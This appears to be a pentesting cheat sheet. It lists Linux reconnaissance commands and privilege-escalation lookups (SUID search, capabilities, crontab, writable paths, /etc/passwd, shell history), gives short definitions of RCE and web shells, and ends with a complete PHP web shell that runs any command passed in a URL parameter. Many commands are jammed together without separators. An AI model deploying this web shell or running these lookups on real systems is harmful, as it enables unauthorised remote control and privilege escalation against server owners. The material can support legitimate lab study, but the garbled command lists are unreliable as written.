hostnameuname -acat /proc/versioncat /etc/issue
psps -Aps axjfps aux
env
sudo -l
lsls -la
idcat /etc/passwd
history
ifconfigip routenetstatnetstat -anetstat -atnetstat -aunetstat -lnetstat -snetstat -tpnetstat -anonetstat -i
find . -name <filename>find /home -name <filename>find / -type d -name <directory_name>find / -type f -perm 0777find / -perm a=xfind /home -user <username>find / -mtime <days>find / -atime <days>find / -cmin -<minutes>find / -amin -<minutes>find / -size <size>find / -size +<size>find / -size -<size>
find / -type f -perm -04000 -ls 2>/dev/null(Privilege Escalation)
getcap -r / 2>/dev/null(Privilege Escalation)
cat /etc/crontab(Privilege Escalation)
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u(Privilege Escalation)
-
RCE: Remote code execution (RCE) happens when an attacker finds a way to run their own code on a system. This is a highly dangerous vulnerability because it can allow the attacker to take control of the system, exfiltrate sensitive data, or compromise other connected systems.
-
Web shell: A web shell is a script that attackers upload to a vulnerable server, giving them remote control over it. Once a web shell is in place, attackers can run commands, manipulate files, and essentially use the compromised server as their own. They can even use it to launch attacks on other systems.
-
Simple web shell:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['command']))
{
system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>```